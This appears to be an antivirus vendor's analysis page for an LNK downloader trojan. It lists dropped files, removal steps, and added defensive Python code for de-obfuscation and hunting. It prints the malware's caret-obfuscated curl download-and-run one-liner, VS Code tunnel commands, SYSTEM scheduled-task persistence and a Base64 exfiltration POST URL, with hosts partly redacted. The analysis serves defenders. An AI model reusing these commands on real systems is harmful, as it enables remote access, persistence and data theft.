Trojan.LNK.DOWNLOADER.D
October 2, 2024
Alias:
HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)
Platform:
Windows
Overall risk rating:
Damage potential:
Distribution potential:
Reported infection:
Information exposure:

Malware type:
Trojan
Destructive?:
No
Encrypted?:
In the Wild:
Yes
Overview
Infection channel: Downloaded from the Internet, Dropped by other malware
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Technical Details
File size: 2,044 bytes
File type: LNK
Initial samples received date: September 30, 2024
Payload: Drops files, Connects to URLs/IPs
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
It drops the following files:
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\python.zip
- After extracting python.zip to %AppDataLocal%\Microsoft\Python:
- _asyncio.pyd
- _bz2.pyd
- _ctypes.pyd
- _decimal.pyd
- _elementtree.pyd
- _hashlib.pyd
- _lzma.pyd
- _msi.pyd
- _multiprocessing.pyd
- _overlapped.pyd
- _queue.pyd
- _socket.pyd
- _sqlite3.pyd
- _ssl.pyd
- _uuid.pyd
- _wmi.pyd
- _zoneinfo.pyd
- libcrypto-3.dll
- libffi-8.dll
- libssl-3.dll
- LICENSE.txt
- pyexpat.pyd
- python.cat
- python.exe
- python.zip
- python3.dll
- python312._pth
- python312.dll
- python312.zip
- pythonw.exe
- select.pyd
- sqlite3.dll
- unicodedata.pyd
- vcruntime140_1.dll
- vcruntime140.dll
- winsound.pyd
It adds the following processes:
- "%System%\cmd.exe" /c start msg {Username} "安裝成功" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"
It creates the following folders:
- %AppDataLocal%\Microsoft\Python
Download Routine
It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\python.zip → the legitimate Python 3.12.5 x64 embeddable zip package
- %AppDataLocal%\Microsoft\Python\update.py → malicious Python code
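The one-liner the LNK runs hides its tooling behind cmd.exe caret escapes: cmd.exe treats `^` outside double quotes as an escape character, so `c^u^r^l` executes `curl` while a naive string search of the shortcut for "curl" finds nothing. The following is an added example written for this page, not code from the report or from the malware: it removes the escapes the way cmd.exe does, splits the chain on unquoted `&`, and lists what each curl call fetches and where it writes it. The command text is the one reported above, with the vendor's `{BLOCKED}` host redactions left in place; the function names and the splitting logic are the editor's.

```python
"""Added example (editor's code, not from the report): recover the plain
command behind the caret-obfuscated cmd.exe chain the LNK launches, then
extract the download URLs, output paths and the final payload launch.
"""
import re

# Command line as reported on this page (hosts redacted by the vendor).
LNK_COMMAND = (
    '"%System%\\cmd.exe" /c start msg {Username} "安裝成功" & c^u^r^l -s -k '
    "https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip "
    '-o "%AppDataLocal%\\Microsoft\\python.zip" & timeout 10 & '
    'mkdir "%AppDataLocal%\\Microsoft\\Python" & '
    'tar -xf "%AppDataLocal%\\Microsoft\\python.zip" -C "%AppDataLocal%\\Microsoft\\Python" & '
    "c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 "
    '-o "%AppDataLocal%\\Microsoft\\Python\\update.py" & '
    'start "" /B "%AppDataLocal%\\Microsoft\\Python\\pythonw.exe" '
    '"%AppDataLocal%\\Microsoft\\Python\\update.py"'
)

# Leading '"...\cmd.exe" /c ' (or /k) wrapper that precedes the real chain.
_CMD_PREFIX = re.compile(r'^\s*"?[^"\s]*cmd\.exe"?\s+/[cCkK]\s+')


def unescape_cmd(cmdline: str) -> str:
    """Drop cmd.exe caret escapes that sit outside double-quoted text.

    Inside double quotes cmd.exe does not treat '^' specially, so a quoted
    caret is kept; outside quotes '^X' becomes just 'X'.
    """
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])  # keep only the escaped character
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def split_commands(cmdline: str) -> list:
    """Split a cmd.exe chain on unquoted '&', '&&', '|' and '||'."""
    cmdline = _CMD_PREFIX.sub("", cmdline, count=1)
    parts, buf, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        if ch in "&|" and not in_quotes:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def tokens(command: str) -> list:
    """Tokenise one command, keeping quoted paths whole and unquoting them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def extract_downloads(commands: list) -> list:
    """One record per curl invocation: URL, output path and notable flags."""
    found = []
    for cmd in commands:
        toks = tokens(cmd)
        if not toks or toks[0].lower() not in ("curl", "curl.exe"):
            continue
        url = next((t for t in toks if re.match(r"https?://", t)), None)
        dest = None
        if "-o" in toks and toks.index("-o") + 1 < len(toks):
            dest = toks[toks.index("-o") + 1]
        found.append({
            "url": url,
            "dest": dest,
            # -k / --insecure disables certificate verification
            "insecure_tls": "-k" in toks or "--insecure" in toks,
            "silent": "-s" in toks,
        })
    return found


def find_launch(commands: list):
    """Return the command that runs the payload windowless via 'start /B'."""
    for cmd in commands:
        toks = [t.lower() for t in tokens(cmd)]
        if toks and toks[0] == "start" and "/b" in toks and any(
            t.endswith("pythonw.exe") for t in toks
        ):
            return cmd
    return None


if __name__ == "__main__":
    cmds = split_commands(unescape_cmd(LNK_COMMAND))
    for c in cmds:
        print(c)
    for d in extract_downloads(cmds):
        print(d)
    print("payload launch:", find_launch(cmds))
```

Running it prints seven plain commands, two download records (both with `-s -k`, i.e. silent and with TLS certificate checks disabled) and the `start "" /B … pythonw.exe … update.py` launch. The same de-obfuscation applies to any caret-laced cmd.exe line found in a shortcut's command-line argument field or in process-creation telemetry.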
Other Details
It does the following:
- It displays a message to the logged-on user via msg.exe reading "安裝成功" ("Installation successful").
- It downloads the legitimate 64-bit Python 3.12.5 embeddable zip package and extracts its contents.
- It downloads a malicious Python script from a URL and executes it with the extracted Python package, using pythonw.exe so that no console window is shown.
- It requires the following command line tools to proceed with its intended routine (both ship with Windows 10 version 1803 and later and Windows Server 2019 and later, so no additional tooling needs to be dropped):
- curl
- tar
- The executed Python code does the following:
- It enumerates running processes using the tasklist command.
- It connects to the following URL(s) to download its component file(s):
- https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
- It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\vscode.zip → contains a file named code.exe
- It adds the following folders:
- %AppDataLocal%\Microsoft\VSCode
- It extracts the zip file into the created folder with the following filename:
- %AppDataLocal%\Microsoft\VSCode\code.exe
- After extraction, it deletes the previously downloaded zip file.
- It adds the following processes:
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
- It saves the output of those commands into the following files:
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- It runs one of the following commands to create a scheduled task, depending on the privileges it is executed with:
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
- It retrieves the following information from the affected system:
- System Locale
- Computer Name
- Username
- User Domain
- %Program Files% Contents
- %ProgramData% Contents
- %System Root%\Users Contents
- It encodes the collected information into a Base64 format.
- It sends the gathered information via HTTP POST to the following URL:
- http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
- It adds the following scheduled tasks:
- If executed as a standard user:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: One time at 8:00 AM on {Scheduled Task Create Time}, then repeats every 04:00:00 indefinitely.
Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- If executed as an administrator:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: At log on of any user
Run as: SYSTEM (/ru SYSTEM) with highest privileges (/rl HIGHEST)
Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Note: in the administrator variant the task action points at a script inside the user's own profile, so whoever can modify update.py has code running as SYSTEM at every logon. The task name imitates a Microsoft component to blend into the task list.
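As an added hunting example (editor's code, not from the report), the rules below encode the behaviours documented in this section and run them over a handful of constructed telemetry records: an embedded Python runtime executing from `%LocalAppData%\Microsoft\Python`, `code.exe` being started with the `tunnel` subcommand, `curl -k` writing into a user profile, creation of the `MicrosoftHealthcareMonitorNode` task (or any SYSTEM task whose action lives in a user-writable path), and an HTTP POST whose last URL path segment is a Base64 blob. The event records, the `.invalid` hostnames and the Base64 content are invented for the example; the report does not say how the collected system information is laid out before it is encoded.

```python
"""Added hunting example (editor's code, not from the report): rules for the
behaviours documented on this page, run over constructed telemetry.

EVENTS is invented in the shape a process-creation / web-proxy log might
give. Hostnames use .invalid and the base64 blob in the POST was made up here.
"""
import base64
import re
from urllib.parse import urlsplit

EVENTS = [  # constructed, not real log data
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl -s -k https://python.invalid/python-3.12.5-embed-amd64.zip -o "C:\Users\u\AppData\Local\Microsoft\python.zip"'},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe",
     "cmdline": r'"C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe" "C:\Users\u\AppData\Local\Microsoft\Python\update.py"'},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Microsoft\VSCode\code.exe",
     "cmdline": r'code.exe --locale en-US tunnel --accept-server-license-terms --name "WS-042"'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe C:\Users\u\AppData\Local\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f'},
    {"type": "http", "method": "POST",
     "url": "http://collector.invalid/r/2yxp98b3/" + base64.b64encode(b"en-US|WS-042|u|WORKGROUP").decode()},
    # Benign noise that the rules must leave alone.
    {"type": "process", "image": r"C:\Program Files\Python312\python.exe", "cmdline": "python -m pytest"},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Programs\Microsoft VS Code\Code.exe", "cmdline": r"Code.exe C:\src\project"},
    {"type": "http", "method": "GET", "url": "https://update.invalid/status"},
]

# Staging folders named on this page, and a generic user-writable profile path.
STAGING_DIR = re.compile(r"\\appdata\\local\\microsoft\\(python|vscode)\\", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
TASK_NAME = "MicrosoftHealthcareMonitorNode"


def check_process(ev):
    """Return a finding string for a process-creation record, or None."""
    img, cmd = ev["image"], ev["cmdline"]
    base = img.rsplit("\\", 1)[-1].lower()
    low = cmd.lower()
    if base in ("python.exe", "pythonw.exe") and STAGING_DIR.search(img):
        return "embedded Python runtime running from %LocalAppData%\\Microsoft\\Python"
    if base == "code.exe" and re.search(r"\btunnel\b", low):
        return "VS Code CLI starting a remote tunnel (verify who owns the tunnel)"
    if base == "curl.exe" and " -k " in f" {cmd} " and USER_WRITABLE.search(cmd):
        return "curl writing into a user profile with certificate checks disabled (-k)"
    if base == "schtasks.exe" and "/create" in low:
        if TASK_NAME.lower() in low:
            return f"scheduled task {TASK_NAME} created"
        if "/ru system" in low and USER_WRITABLE.search(cmd):
            return "SYSTEM scheduled task whose action lives in a user-writable path"
    return None


def check_http(ev):
    """Flag a POST whose last path segment is base64 that decodes to text."""
    if ev.get("method") != "POST":
        return None
    seg = urlsplit(ev["url"]).path.rsplit("/", 1)[-1]
    seg = seg.replace("-", "+").replace("_", "/")  # accept URL-safe base64 too
    try:
        blob = base64.b64decode(seg, validate=True)
        text = blob.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not blob:
        return None
    return f"POST carrying base64 data in the URL path: {text!r}"


def triage(events):
    """Return (index, finding) for every record that some rule matches."""
    findings = []
    for i, ev in enumerate(events):
        hit = None
        if ev["type"] == "process":
            hit = check_process(ev)
        elif ev["type"] == "http":
            hit = check_http(ev)
        if hit:
            findings.append((i, hit))
    return findings


if __name__ == "__main__":
    for idx, finding in triage(EVENTS):
        print(f"event {idx}: {finding}")
```

The first five records are flagged and the three benign ones are not. Two caveats: VS Code tunnels have legitimate developer use, so the `tunnel` rule is a lead to verify rather than a verdict; and standard Base64 can contain `/`, which would split the path segment, so a real collector may well use the URL-safe alphabet the decoder also accepts. If the task is found on a host, remove it as well as the files (for example `schtasks /Delete /TN MicrosoftHealthcareMonitorNode /F`, the editor's suggestion, not a step from the report), since the file removal steps alone leave the trigger in place.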
Solution
Minimum scan engine: 9.800
First VSAPI pattern file: 19.624.03
First VSAPI pattern release date: October 1, 2024
VSAPI OPR pattern version: 19.625.00
VSAPI OPR pattern release date: October 2, 2024
Step 1
For Windows ME and XP users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Note: Not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Restart in Safe Mode
Step 5
Search and delete these files
Some component files may be hidden. Please make sure you check the "Search Hidden Files and Folders" checkbox in the advanced options so that the search results include all hidden files and folders.
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
Step 6
Search and delete these folders
Please make sure you check the "Search Hidden Files and Folders" checkbox in the advanced options so that the search results include all hidden folders.
- %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
Step 7
Restart in normal mode and scan your computer with your AsiaInfo Security product for files detected as Trojan.LNK.DOWNLOADER.D. If the detected files have already been cleaned, deleted, or quarantined by your AsiaInfo Security product, no further step is required. You may opt to simply delete the quarantined files. Please refer to the knowledge base page for more details.